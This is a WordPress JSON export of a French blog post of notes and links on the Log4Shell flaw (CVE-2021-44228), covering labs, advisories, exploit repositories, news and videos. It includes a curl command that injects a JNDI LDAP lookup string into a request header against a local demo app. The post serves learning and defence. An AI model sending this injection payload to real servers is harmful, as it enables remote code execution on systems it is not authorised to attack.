{"id":4878,"date":"2021-12-23T12:39:09","date_gmt":"2021-12-23T10:39:09","guid":{"rendered":"https:\/\/www.laurentmarot.fr\/wordpress\/?p=4878"},"modified":"2022-02-14T16:42:35","modified_gmt":"2022-02-14T14:42:35","slug":"quelques-notes-sur-log4j","status":"publish","type":"post","link":"https:\/\/www.laurentmarot.fr\/wordpress\/?p=4878","title":{"rendered":"Quelques notes sur Log4j"},"content":{"rendered":"

Juste pour comprendre, pour m\u00e9moire … et montrer \u00e0 quelques int\u00e9ress\u00e9s.<\/p>\n

\"Source<\/a>

Source: https:\/\/xkcd.com\/2347\/<\/p><\/div>\n

Gal\u00e8res initiales :<\/strong><\/p>\n

-J-Xbootclasspath\/a<\/code><\/pre>\n
=> Salet\u00e9 de dysfonctionnment de Netbeans avec Java15<\/p>\n
et outillage :<\/p>\n
http:\/\/canarytokens.com\/tags\/traffic\/articles\/o7g2h2mrvsa52bpe08k5g6sud\/contact.php<\/p>\n
Liste de ressources et conseils techs :<\/strong><\/p>\n
-Dlog4j.configurationFile=\/path\/to\/your\/file\/log4j2.xml <\/code> => inutile !<\/pre>\n
un ptit coup de curl vers le \u00ab\u00a0faux\u00a0\u00bb serveur LDAP qui va \u00ab\u00a0juste\u00a0\u00bb rediriger vers le serveur h\u00e9bergeant la classe java \u00ab\u00a0Payload\u00a0\u00bb:<\/p>\n
curl 127.0.0.1:8080\/Log4ShellDemo\/LoggingPage.jsp\r\n-H 'X-Api-Version: ${jndi:ldap:\/\/127.0.0.1:1389\/Exploit}'\r\n\r\n<\/pre>\n
Try Hack Me Free interactive training lab<\/a> demonstrating the log4j vulnerability and mitigation methods and short video<\/a>. Solar, exploiting log4j – Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun. Room created by John Hammond.<\/p>\n
Analyse de la faille Log4J par Maxime-Mn<\/a> (tr\u00e8s largement inspir\u00e9 de la Room de John Hammond ci-dessuss)<\/p>\n
Log4j2 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08cve-2021-44228\uff09\u590d\u73b0\uff08\u53cd\u5f39shell)<\/a> : un peu chinois mais vraiment le minimum n\u00e9cessaire et suffisant<\/p>\n
Un exploit tout mignon qui lance Calc<\/a> par Roxas-Tan (COMIT du 16\/12\/2021)<\/p>\n
Log4Shell – Unauthenticated RCE 0-day exploit (CVE-2021-44228)<\/a> par ATOS Threat Intelligence Team (20\/12\/2021). Il y a de la mati\u00e8re, mais c’est illisible<\/p>\n
L’exploit de base en Python<\/a> (Exploit DB -11\/12\/2021) par kozmer<\/p>\n
Inside the code: How the Log4Shell exploit works<\/a> by  Hardik Shah<\/a>, <\/span> Sean Gallagher<\/a> December 17, 2021<\/a> (Sophos Labs). Tr\u00e8s int\u00e9ressant pour la partie fonctionnement de Log4j.<\/span><\/p>\n
Log4Shell : Le cadeau de No\u00ebl empoisonn\u00e9 en cette fin d\u2019ann\u00e9e<\/a> – Almond (15 d\u00e9cembre 2021). Bon rappel historique et contextuel<\/p>\n
Le thread de Cyrilel Chaudoit sur Twitte<\/a>r (27\/12\/2021) : Comprendre (simplement) la faille <\/span>#Log4shell<\/a><\/span> #Log4j<\/a><\/span> et ses enjeux…<\/span><\/p>\n
Liste des produits affect\u00e9s<\/a> (mise \u00e0 jour du 29\/12\/2021 par Cybersecurity and Infrastructure Security Agency)<\/p>\n
Investigating CVE-2021-44228 Log4Shell Vulnerability<\/a> par Sanara Marsh et Chad Skipper (VMware Threat Research Team) Posted on December 12, 2021. Avec une partie tr\u00e8s int\u00e9ressante sur les m\u00e9canismes d’exploitation et possibilit\u00e9s d’infection par Mirai<\/p>\n
Tr\u00e8s bon papier du CERT XMCO sur log4j<\/p>\n
Mise \u00e0 jour du Bulletin d’alerte<\/a> du CERT-FR (7 janvier 2022)<\/p>\n
Log4j flaw attack levels remain high, Microsoft warns – ZDNET<\/a> 4 janvier 2022<\/p>\n
Log4j flaw hunt shows how complicated the software supply chain really is – ZDNET<\/a> 6 janvier 2022<\/p>\n
Ransomware: Hackers are using Log4j flaw as part of their attacks, warns Microsoft – ZDNET<\/a> 11 janvier 2022<\/p>\n
Log4j: How hackers are using the flaw to deliver this new ‘modular’ backdoor – ZDNET<\/a> 12 janvier 2022
\n
\nJolies images :<\/strong><\/span><\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
\"Cr\u00e9dits:<\/a>
Cr\u00e9dits: govcert.ch<\/p><\/div>\n
\"Apache<\/a>
Apache Log4J Vulnerability – CVE-2021-44228 Flyer<\/a><\/p><\/div>\n
Vid\u00e9os et Podcasts sympas :<\/strong><\/p>\n
CVE-2021-44228 Log4shell : Comment d\u00e9tecter et corriger cette vuln\u00e9rabilit\u00e9 sur log4j<\/a> – (Cyberwatch – 52 mn)<\/p>\n
Le bulletin hebdo de No Limit Secu d\u00e9di\u00e9\u00a0 \u00e0 Log4Shell<\/a> (\u00e9pisode 346 du 13 d\u00e9cembre 2021)<\/p>\n
Panique g\u00e9n\u00e9rale ! Comment se prot\u00e9ger de Log4Shell ?<\/a> capsule vid\u00e9o du 16 d\u00e9cembre par Romain du Marais<\/p>\n
 <\/p>\n
Quelques r\u00e9flexions sur le sujet :<\/strong><\/p>\n
Apache Log4j bug: China\u2019s industry ministry pulls support from Alibaba Cloud for not reporting flaw to government first<\/a> par Xinmei Shen<\/a> 
Log4Shell, et le financement du logiciel libre<\/a> par St\u00e9phane Bortzmeyer (Premi\u00e8re r\u00e9daction de l’article le 14 d\u00e9cembre 2021)<\/p>\n
Microsoft Spots Multiple Nation-State APTs Exploiting Log4j Flaw<\/a> – Security Week By Ryan Naraine<\/a> on December 15, 2021<\/p>\n
j’en ai des plus croustillantes \u00e0 partager oralement<\/p>\n\n","protected":false},"excerpt":{"rendered":"
Juste pour comprendre, pour m\u00e9moire … et montrer \u00e0 quelques int\u00e9ress\u00e9s. Gal\u00e8res initiales : -J-Xbootclasspath\/a => Salet\u00e9 de dysfonctionnment de Netbeans avec Java15 et outillage : http:\/\/canarytokens.com\/tags\/traffic\/articles\/o7g2h2mrvsa52bpe08k5g6sud\/contact.php Liste de ressources et conseils techs : -Dlog4j.configurationFile=\/path\/to\/your\/file\/log4j2.xml => inutile ! un ptit coup de curl vers le \u00ab\u00a0faux\u00a0\u00bb serveur LDAP qui va \u00ab\u00a0juste\u00a0\u00bb rediriger vers le serveur […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[],"_links":{"self":[{"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/4878"}],"collection":[{"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4878"}],"version-history":[{"count":39,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/4878\/revisions"}],"predecessor-version":[{"id":4940,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/4878\/revisions\/4940"}],"wp:attachment":[{"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4878"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4878"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.laurentmarot.fr\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4878"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}